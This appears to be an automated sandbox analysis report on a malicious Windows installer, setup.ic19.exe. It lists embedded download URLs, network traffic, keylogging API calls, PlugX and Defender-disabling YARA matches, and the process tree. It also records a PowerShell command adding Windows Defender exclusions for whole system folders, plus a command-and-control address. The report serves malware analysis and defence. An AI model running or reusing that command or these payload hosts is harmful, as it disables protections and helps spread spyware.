Source: setup.ic19.exe, 00000000.00000003.1900207800.0000000000609000.00000004.00000020.00020000.00000000.sdmp, setup.ic19.exe, 00000000.00000003.1874118144.0000000000609000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://101oss.oss-cn-beijing.aliyuncs.com/Psd
Source: setup.ic19.exe, 00000000.00000003.1874042033.0000000000651000.00000004.00000020.00020000.00000000.sdmp, setup.ic19.exe, 00000000.00000003.1900269212.0000000000670000.00000004.00000020.00020000.00000000.sdmp, setup.ic19.exe, 00000000.00000003.1900140739.0000000000651000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://101oss.oss-cn-beijing.aliyuncs.com/a.gif
Source: setup.ic19.exe, 00000000.00000003.1874042033.0000000000651000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://101oss.oss-cn-beijing.aliyuncs.com/a.gif6
Source: setup.ic19.exe, 00000000.00000003.1874042033.0000000000651000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://101oss.oss-cn-beijing.aliyuncs.com/a.gifcf
Source: setup.ic19.exe, 00000000.00000003.1874042033.0000000000651000.00000004.00000020.00020000.00000000.sdmp, setup.ic19.exe, 00000000.00000003.1900269212.0000000000670000.00000004.00000020.00020000.00000000.sdmp, setup.ic19.exe, 00000000.00000003.1900140739.0000000000651000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://101oss.oss-cn-beijing.aliyuncs.com/a.gifhttps://101oss.oss-cn-beijing.aliyuncs.com/b.gifhttp
Source: setup.ic19.exe, 00000000.00000003.1874042033.0000000000651000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://101oss.oss-cn-beijing.aliyuncs.com/a.gifnf
Source: setup.ic19.exe, 00000000.00000003.1874042033.0000000000651000.00000004.00000020.00020000.00000000.sdmp, setup.ic19.exe, 00000000.00000003.1900140739.0000000000651000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://101oss.oss-cn-beijing.aliyuncs.com/a.gift
Source: setup.ic19.exe, 00000000.00000003.1874042033.0000000000651000.00000004.00000020.00020000.00000000.sdmp, setup.ic19.exe, 00000000.00000003.1900269212.0000000000670000.00000004.00000020.00020000.00000000.sdmp, setup.ic19.exe, 00000000.00000003.1900140739.0000000000651000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://101oss.oss-cn-beijing.aliyuncs.com/b.gif
Source: setup.ic19.exe, 00000000.00000003.1900140739.0000000000651000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://101oss.oss-cn-beijing.aliyuncs.com/b.gif6
Source: setup.ic19.exe, 00000000.00000003.1900140739.0000000000651000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://101oss.oss-cn-beijing.aliyuncs.com/b.gifaf
Source: setup.ic19.exe, 00000000.00000003.1900140739.0000000000651000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://101oss.oss-cn-beijing.aliyuncs.com/b.gifcf
Source: setup.ic19.exe, 00000000.00000003.1900140739.0000000000651000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://101oss.oss-cn-beijing.aliyuncs.com/b.gifhff
Source: setup.ic19.exe, 00000000.00000003.1874042033.0000000000651000.00000004.00000020.00020000.00000000.sdmp, setup.ic19.exe, 00000000.00000003.1900269212.0000000000670000.00000004.00000020.00020000.00000000.sdmp, setup.ic19.exe, 00000000.00000003.1900140739.0000000000651000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://101oss.oss-cn-beijing.aliyuncs.com/c.gif
Source: setup.ic19.exe, 00000000.00000003.1874042033.0000000000651000.00000004.00000020.00020000.00000000.sdmp, setup.ic19.exe, 00000000.00000003.1900269212.0000000000670000.00000004.00000020.00020000.00000000.sdmp, setup.ic19.exe, 00000000.00000003.1900140739.0000000000651000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://101oss.oss-cn-beijing.aliyuncs.com/d.gif
Source: powershell.exe, 0000000E.00000002.3216421375.00000000040F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 0000000E.00000002.3220521632.000000000514E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000E.00000002.3220521632.000000000514E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000E.00000002.3220521632.000000000514E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000E.00000002.3216421375.0000000004245000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000E.00000002.3220521632.000000000514E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: Atrebution.sys.0.dr	String found in binary or memory: https://www.digicert.com/CPS0

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 39.103.20.76:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 118.178.60.61:443 -> 192.168.2.4:49744 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to capture and log keystrokes

Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Code function: <BackSpace>	7_2_1000C9D1
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Code function: <Enter>	7_2_1000C9D1
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Code function: <BackSpace>	7_2_10003D1A
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Code function: <Enter>	7_2_10003D1A

Source: C:\Users\user\AppData\Roaming\8AfroU.exe

Code function: 4_2_00406A9C DefWindowProcA,SetTimer,GetDC,DeleteObject,GetDIBits,FindWindowA,GetWindowLongA,GetSystemMetrics,GetSystemMetrics,ReleaseDC,CreateCompatibleDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,SelectObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,SetBkColor,BitBlt,SetBkColor,SetTextColor,BitBlt,BitBlt,BitBlt,BitBlt,BitBlt,SetBkColor,SetTextColor,SelectObject,SelectObject,SelectObject,DeleteDC,DeleteDC,DeleteDC,DeleteObject,DeleteObject,DeleteObject,PostQuitMessage,

4_2_00406A9C

Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe

Code function: 7_2_1000C9D1 CreateMutexA,WaitForSingleObject,Sleep,lstrlenA,GetKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,lstrcatA,lstrlenA,lstrcatA,lstrcatA,lstrcatA,

7_2_1000C9D1

Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe

Code function: 7_2_10023788 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,

7_2_10023788

System Summary

Malicious sample detected (through community Yara rule)

Source: 7.2.lXAMaI.exe.2de0000.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
Source: Process Memory Space: lXAMaI.exe PID: 6852, type: MEMORYSTR	Matched rule: PlugX Identifying Strings Author: Seth Hardy

PE file contains section with special chars

Source: hccutils.dll.0.dr	Static PE information: section name: .C,D
Source: hccutils.dll.0.dr	Static PE information: section name: .N)b
Source: tbcore3U.dll.5.dr	Static PE information: section name: .%?.
Source: tbcore3U.dll.5.dr	Static PE information: section name: .%-[
Source: tbcore3U.dll.5.dr	Static PE information: section name: .mo:
Source: tbcore3U.dll.7.dr	Static PE information: section name: .%?.
Source: tbcore3U.dll.7.dr	Static PE information: section name: .%-[
Source: tbcore3U.dll.7.dr	Static PE information: section name: .mo:

Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Code function: 4_2_0040B685 NtAllocateVirtualMemory,LdrLoadDll,		4_2_0040B685
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Code function: 7_2_00410565 NtAllocateVirtualMemory,LdrLoadDll,		7_2_00410565

Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe

Code function: 7_2_10008578 LoadLibraryA,GetProcAddress,GetCurrentProcess,OpenProcessToken,DuplicateTokenEx,LoadLibraryA,GetProcAddress,SetTokenInformation,CreateProcessAsUserA,CloseHandle,CloseHandle,FreeLibrary,

7_2_10008578

Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe

Code function: 7_2_10004A84 ExitWindowsEx,

7_2_10004A84

Source: C:\Users\user\Desktop\setup.ic19.exe

File created: C:\Users\user\AppData\Roaming\Atrebution.sys

Jump to behavior

Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Code function: 4_2_0040305C	4_2_0040305C
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Code function: 4_2_004060E0	4_2_004060E0
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Code function: 4_2_004041F0	4_2_004041F0
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Code function: 4_2_004056F4	4_2_004056F4
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Code function: 4_2_00406A9C	4_2_00406A9C
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Code function: 4_2_00407B00	4_2_00407B00
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Code function: 4_2_00412300	4_2_00412300
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Code function: 4_2_004037D4	4_2_004037D4
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Code function: 7_2_00434AE2	7_2_00434AE2
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Code function: 7_2_02E7C28F	7_2_02E7C28F
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Code function: 7_2_02FB73F1	7_2_02FB73F1
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Code function: 7_2_02DEC3B2	7_2_02DEC3B2
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Code function: 7_2_02DF7080	7_2_02DF7080
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Code function: 7_2_02DFB605	7_2_02DFB605
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Code function: 7_2_02DF752B	7_2_02DF752B
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Code function: 7_2_02F86AFF	7_2_02F86AFF
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Code function: 7_2_02F86AF6	7_2_02F86AF6
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Code function: 7_2_02F86AE3	7_2_02F86AE3
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Code function: 7_2_02E37F3C	7_2_02E37F3C
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Code function: 7_2_035B1B1B	7_2_035B1B1B
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Code function: 7_2_035A5AAC	7_2_035A5AAC
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Code function: 7_2_035ABD9B	7_2_035ABD9B
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Code function: 7_2_035AB8F0	7_2_035AB8F0
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Code function: 7_2_03611B1B	7_2_03611B1B
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Code function: 7_2_03605AAC	7_2_03605AAC
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Code function: 7_2_0360BD9B	7_2_0360BD9B
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Code function: 7_2_0360B8F0	7_2_0360B8F0
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Code function: 7_2_100131A0	7_2_100131A0
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Code function: 7_2_1001B481	7_2_1001B481
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Code function: 7_2_10022BDA	7_2_10022BDA
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Code function: 7_2_10017C8A	7_2_10017C8A
Source: C:\Program Files (x86)\eL62Gl4\80c2T80R.exe	Code function: 9_2_00424AE2	9_2_00424AE2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_0279B570	14_2_0279B570
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_0279D76D	14_2_0279D76D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_0279C72F	14_2_0279C72F

Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Code function: String function: 03601C90 appears 34 times
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Code function: String function: 035A1C90 appears 34 times
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Code function: String function: 1001F7C4 appears 69 times
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Code function: String function: 1000241C appears 37 times
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Code function: String function: 100124FB appears 48 times

Source: setup.ic19.exe, 00000000.00000003.1900287688.0000000002C21000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameIGFXTRAY.EXE vs setup.ic19.exe
Source: setup.ic19.exe, 00000000.00000003.1900573212.0000000002C21000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameIGFXTRAY.EXE vs setup.ic19.exe
Source: setup.ic19.exe, 00000000.00000003.1900501095.0000000002C21000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameIGFXTRAY.EXE vs setup.ic19.exe
Source: setup.ic19.exe, 00000000.00000003.1900363601.0000000002C21000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameIGFXTRAY.EXE vs setup.ic19.exe
Source: setup.ic19.exe, 00000000.00000003.1900690712.0000000002C01000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameIGFXTRAY.EXE vs setup.ic19.exe
Source: setup.ic19.exe, 00000000.00000000.1645603678.0000000140042000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameDWRCST.exe@ vs setup.ic19.exe
Source: setup.ic19.exe, 00000000.00000003.1900393693.0000000002C21000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameIGFXTRAY.EXE vs setup.ic19.exe
Source: setup.ic19.exe, 00000000.00000003.1900108795.0000000002C19000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameIGFXTRAY.EXE vs setup.ic19.exe
Source: setup.ic19.exe, 00000000.00000003.1900602585.0000000002C21000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameIGFXTRAY.EXE vs setup.ic19.exe
Source: setup.ic19.exe, 00000000.00000003.1900469658.0000000002C21000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameIGFXTRAY.EXE vs setup.ic19.exe
Source: setup.ic19.exe	Binary or memory string: OriginalFilenameDWRCST.exe@ vs setup.ic19.exe

Source: 7.2.lXAMaI.exe.2de0000.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
Source: Process Memory Space: lXAMaI.exe PID: 6852, type: MEMORYSTR	Matched rule: PlugXStrings author = Seth Hardy, description = PlugX Identifying Strings, last_modified = 2014-06-12

Source: Atrebution.sys.0.dr	Binary string: \Device\Driver\
Source: Atrebution.sys.0.dr	Binary string: \Device\TrueSight

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@18/35@14/3

Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe

Code function: GetModuleFileNameA,wsprintfA,OpenSCManagerA,CreateServiceA,LockServiceDatabase,ChangeServiceConfig2A,ChangeServiceConfig2A,UnlockServiceDatabase,GetLastError,OpenServiceA,StartServiceA,StartServiceA,RegOpenKeyA,lstrlenA,RegSetValueExA,

7_2_1000B825

Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe

Code function: 7_2_02DE36B0 CreateToolhelp32Snapshot,Process32Next,CloseHandle,

7_2_02DE36B0

Source: C:\Users\user\AppData\Roaming\8AfroU.exe

Code function: 4_2_00402C30 CoCreateInstance,

4_2_00402C30

Source: C:\Users\user\AppData\Roaming\8AfroU.exe

Code function: 4_2_00405130 lstrlenW,WideCharToMultiByte,LoadLibraryExA,GetLastError,GetLastError,GetLastError,FindResourceA,GetLastError,GetLastError,GetLastError,LoadResource,GetLastError,GetLastError,GetLastError,SizeofResource,FreeLibrary,

4_2_00405130

Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe

Code function: 7_2_1000AFA5 Edge,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,WSAStartup,socket,GetCurrentThreadId,htons,inet_addr,connect,ExitProcess,InternetOpenA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,GetModuleFileNameA,CopyFileA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,Sleep,StartServiceCtrlDispatcherA,GetModuleFileNameA,CopyFileA,Sleep,Sleep,Sleep,

7_2_1000AFA5

Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe

7_2_1000AFA5

Source: C:\Users\user\AppData\Roaming\8AfroU.exe

File created: C:\Program Files (x86)\lXAMaI

Jump to behavior

Source: C:\Users\user\Desktop\setup.ic19.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\i[1].dat

Jump to behavior

Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\IEToolbarUninstaller
Source: C:\Users\user\Desktop\setup.ic19.exe	Mutant created: \Sessions\1\BaseNamedObjects\e3a596ac-25f6-43e4-910a-e6a0c89ca722
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3904:120:WilError_03
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Mutant created: \Sessions\1\BaseNamedObjects\{4E062DDA-444A-A2A8-84CE-E105F66A5AB3}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4020:120:WilError_03
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Mutant created: \Sessions\1\BaseNamedObjects\LJPXYXC
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Mutant created: \Sessions\1\BaseNamedObjects\09028dc1-8686-43d3-8a9f-5204788e9bc1
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Mutant created: \Sessions\1\BaseNamedObjects\aefd_124406
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Mutant created: \Sessions\1\BaseNamedObjects\47.76.31.57:9098:Sauron

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i1ttq5pe.yfv.ps1

Jump to behavior

Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Command line argument: tbcore3.dll	7_2_00431000
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Command line argument: tbcore3.dll	7_2_00431000
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Command line argument: tbcore3U.dll	7_2_00431000
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Command line argument: tbcore3U.dll	7_2_00431000
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Command line argument: .C	7_2_00432E30
Source: C:\Program Files (x86)\eL62Gl4\80c2T80R.exe	Command line argument: tbcore3.dll	9_2_00421000
Source: C:\Program Files (x86)\eL62Gl4\80c2T80R.exe	Command line argument: tbcore3.dll	9_2_00421000
Source: C:\Program Files (x86)\eL62Gl4\80c2T80R.exe	Command line argument: tbcore3U.dll	9_2_00421000
Source: C:\Program Files (x86)\eL62Gl4\80c2T80R.exe	Command line argument: tbcore3U.dll	9_2_00421000
Source: C:\Program Files (x86)\eL62Gl4\80c2T80R.exe	Command line argument: .B	9_2_00422E30

Source: setup.ic19.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\AppData\Roaming\8AfroU.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\setup.ic19.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: lXAMaI.exe	String found in binary or memory: <StopOnIdleEnd>true</StopOnIdleEnd> <RestartOnIdle>false</RestartOnIdle> </IdleSettings> <AllowStartOnDemand>t
Source: lXAMaI.exe	String found in binary or memory: <StopOnIdleEnd>true</StopOnIdleEnd> <RestartOnIdle>false</RestartOnIdle> </IdleSettings> <AllowStartOnDemand>t
Source: lXAMaI.exe	String found in binary or memory: tartIfOnBatteries> <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries> <AllowHardTerminate>false</AllowHardTerminate>
Source: lXAMaI.exe	String found in binary or memory: tartIfOnBatteries> <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries> <AllowHardTerminate>false</AllowHardTerminate>
Source: lXAMaI.exe	String found in binary or memory: <Repetition> <Interval>PT1M</Interval> <StopAtDurationEnd>false</StopAtDurationEnd> </Repetition> <Sta
Source: lXAMaI.exe	String found in binary or memory: <Repetition> <Interval>PT1M</Interval> <StopAtDurationEnd>false</StopAtDurationEnd> </Repetition> <Sta

Source: C:\Users\user\Desktop\setup.ic19.exe

File read: C:\Users\user\Desktop\setup.ic19.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\setup.ic19.exe "C:\Users\user\Desktop\setup.ic19.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\8AfroU.exe C:\Users\user\AppData\Roaming\8AfroU.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\8AfroU.exe C:\Users\user\AppData\Roaming\8AfroU.exe
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Process created: C:\Program Files (x86)\lXAMaI\lXAMaI.exe "C:\Program Files (x86)\lXAMaI\lXAMaI.exe"
Source: unknown	Process created: C:\Program Files (x86)\lXAMaI\lXAMaI.exe "C:\Program Files (x86)\lXAMaI\lXAMaI.exe"
Source: unknown	Process created: C:\Program Files (x86)\eL62Gl4\80c2T80R.exe "C:\Program Files (x86)\eL62Gl4\80c2T80R.exe"
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c echo.>c:\xxxx.ini
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Program Files (x86)\eL62Gl4\80c2T80R.exe "C:\Program Files (x86)\eL62Gl4\80c2T80R.exe"
Source: unknown	Process created: C:\Program Files (x86)\lXAMaI\lXAMaI.exe "C:\Program Files (x86)\lXAMaI\lXAMaI.exe"
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\ProgramData','C:\Users','C:\Program Files (x86)' -Force
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown	Process created: C:\Program Files (x86)\eL62Gl4\80c2T80R.exe "C:\Program Files (x86)\eL62Gl4\80c2T80R.exe"
Source: unknown	Process created: C:\Program Files (x86)\lXAMaI\lXAMaI.exe "C:\Program Files (x86)\lXAMaI\lXAMaI.exe"
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Process created: C:\Program Files (x86)\lXAMaI\lXAMaI.exe "C:\Program Files (x86)\lXAMaI\lXAMaI.exe"	Jump to behavior
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c echo.>c:\xxxx.ini	Jump to behavior
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\ProgramData','C:\Users','C:\Program Files (x86)' -Force	Jump to behavior

Source: C:\Users\user\Desktop\setup.ic19.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.ic19.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.ic19.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.ic19.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.ic19.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.ic19.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.ic19.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.ic19.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.ic19.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.ic19.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.ic19.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.ic19.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.ic19.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.ic19.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.ic19.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.ic19.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.ic19.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.ic19.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.ic19.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.ic19.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.ic19.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.ic19.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.ic19.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.ic19.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.ic19.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.ic19.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.ic19.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.ic19.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.ic19.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.ic19.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.ic19.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.ic19.exe	Section loaded: ncrypt.dll	Jump to behavior
